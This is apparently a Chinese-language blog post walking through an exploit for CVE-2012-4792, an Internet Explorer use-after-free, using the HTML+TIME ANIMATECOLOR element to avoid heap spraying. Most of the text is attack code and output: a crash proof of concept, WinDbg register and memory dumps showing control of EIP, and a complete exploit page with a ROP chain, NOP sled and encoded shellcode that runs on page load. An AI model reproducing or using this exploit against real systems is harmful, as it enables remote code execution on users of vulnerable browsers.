前面的一篇用HeapSpary完成了在win7下繞過DEP及ASLR的利用,這次同樣一CVE-2012-4792做爲例子,前面讀國外一篇文章:
http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/
文章提到用一種叫“HTML+TIME”的東西,通過該方法可以實現不需要Heap Spary就能完成exploit,具體說明如下:
<HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> . . . <t:ANIMATECOLOR id="myanim"/>
animvalues = "\u4141\u4141" while(animvalues.length < 0xDC) { animvalues += animvalues } for(i = 0; i < 21; i++) { animvalues += ";cyan"; }
try {
a = document.getElementById('myanim');
a.values = animvalues;
}
catch(e) {}
<!doctype html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> <script> function helloWorld() { var e0 = null; var e1 = null; var e2 = null; animvalues = "\u4141\u4141" while(animvalues.length < 0xDC) { animvalues += animvalues } for(i = 0; i < 21; i++) { animvalues += ";cyan"; } try { e0 = document.getElementById("a"); e1 = document.getElementById("b"); e2 = document.createElement("q"); e1.applyElement(e2); e1.appendChild(document.createElement('button')); e1.applyElement(e0); e2.outerText = ""; e2.appendChild(document.createElement('body')); } catch(e) { } CollectGarbage(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld())"> <t:ANIMATECOLOR id="myanim"/> <form id="a"> </form> <dfn id="b"> </dfn> </body> </html>
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00199c60 ebx=0021d0a8 ecx=00000052 edx=00000000 esi=00000000 edi=00216468
eip=41414141 esp=020df830 ebp=020df8a4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ???
0:008> dd edi
00216468 00199c60 02e1ebc0 0023f5c0 0023f5d8
00216478 0023f578 0016bda0 0016bbd8 00187da0
00216488 0333bce0 0333bcf8 0333bd10 0333bd28
00216498 0333bd40 0333bd58 0333bd70 0333bd88
002164a8 0333bda0 0333bdb8 0333bdd0 0333bde8
002164b8 0333be00 0333be18 eaa84100 ff080000
002164c8 000000fe 00000000 00000000 00000000
002164d8 00000000 00000000 00000000 00000000
0:008> dc poi(edi)
00199c60 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199c70 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199c80 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199c90 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199ca0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199cb0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199cc0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00199cd0 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
0:008> dc poi(edi+4)
02e1ebc0 00790063 006e0061 02e80000 00000000 c.y.a.n.........
02e1ebd0 eaf06f92 ff080167 02e235dc 001f9038 .o..g....5..8...
02e1ebe0 02e8e12c 00000000 eaf06f95 ff0c0100 ,........o......
02e1ebf0 6359d910 00000001 001f9028 00000000 ..Yc....(.......
02e1ec00 eaf06f68 ff0c010a 00000000 00000000 ho..............
02e1ec10 00000001 00000000 eaf06f6b ff080100 ........ko......
02e1ec20 0021cfd0 001f9038 02e1eb78 00000000 ..!.8...x.......
02e1ec30 00000000 00000000 00000000 00000000 ................
0:008> dc poi(edi+8)
0023f5c0 00790063 006e0061 00200000 00000000 c.y.a.n... .....
0023f5d0 eaabd9a2 ff0e0100 00790063 006e0061 ........c.y.a.n.
0023f5e0 00200000 00000000 eaabd9a5 ff080100 .. .............
0023f5f0 00148098 00000001 1690030b 01700d8c ..............p.
0023f600 eaabd9d8 ff080100 0063006e 006c0061 ........n.c.a.l.
0023f610 00700072 00000063 eaabd9db ff0c0100 r.p.c...........
0023f620 00000002 50000001 50000007 02db1318 .......P...P....
0023f630 eaabd9de ff0a0100 0074006e 00760073 ........n.t.s.v.
<!doctype html> <HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <head> <meta> <?IMPORT namespace="t" implementation="#default#time2"> </meta> <script> location.href = 'ms-help://' function helloWorld() { var e0 = null; var e1 = null; var e2 = null; animvalues = "\u34b4\u51bf\u10b8\u51bd\u2d97\u51bd\ucba0\u51bd"+ "\u79e2\u51c3\u9683\u51c5\u6fbd\u51c5\ufffe\ua17f"+ "\u1e01\u51c1\u92d8\u51c3\ue67d\u51bf\u6fbd\u51c5"+ "\ufc3d\ua17f\u1e01\u51c1\u592b\u51bf\ucf3e\u51be"+ "\ud150\u51c5\uf563\u51be\u7402\u51c0\u6fbd\u51c5"+ "\u9090\u9090\ua8dc\u51bd"+ //ROP End "\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+ "\u9090\u9090\u9090\u9090\u9090\u9090\u4a41\u51be"+ "\u9090\u9090"+ "\uc481\uf254\uffff\u2ebf\ue4ed\udbc0\ud9c8\u2474" + "\u58f4\uc933\u33b1\u7831\u0312\u1278\uee83\u06e9" + "\u1235\u4f19\ueab6\u30da\u0f3e\u62eb\u4424\ub35e" + "\u082e\u3853\ub862\u4ce0\ucfab\ufa41\ufe8d\uca52" + "\uac11\u4c91\uaeee\uaec5\u61cf\uae18\u9f08\ue2d3" + "\ud4c1\u1346\ua865\u125a\ua7a9\u6ce3\u77cc\uc697" + "\ua7cf\u5c08\u5f87\u3a22\u5e38\u58e7\u2904\uab8c" + "\ua8fe\ue244\u9bff\ua9a8\u14c1\ub325\u9206\uc6d6" + "\ue17c\ud16b\u9846\u54b7\u3a5b\uce33\ubbbf\u8990" + "\ub734\udd5d\udb13\u3260\ue728\ub5e9\u6eff\u91a9" + "\u2bdb\ubb69\u917a\uc4dc\u7d9d\u6080\u6fd5\u13d5" + "\ue5b4\u9128\u40c2\ua92a\ue2cc\u9843\u6d47\u2513" + "\uca82\u6feb\u7a8f\u3664\u3f45\uc9e9\u03b3\u4a14" + "\ufb36\u52e3\ufe33\ud4a8\u72af\ub0a0\u21cf\u90c1" + "\ua4b3\u7851\u431a\u1bd2\u4162"; for(i = 0; i < 21; i++) { animvalues += ";cyan"; } try { e0 = document.getElementById("a"); e1 = document.getElementById("b"); e2 = document.createElement("q"); e1.applyElement(e2); e1.appendChild(document.createElement('button')); e1.applyElement(e0); e2.outerText = ""; e2.appendChild(document.createElement('body')); } catch(e) { } CollectGarbage(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld())"> <t:ANIMATECOLOR id="myanim"/> <form id="a"> </form> <dfn id="b"> </dfn> </body> </html>
這樣就可以不通過HeapSpary完成漏洞的利用。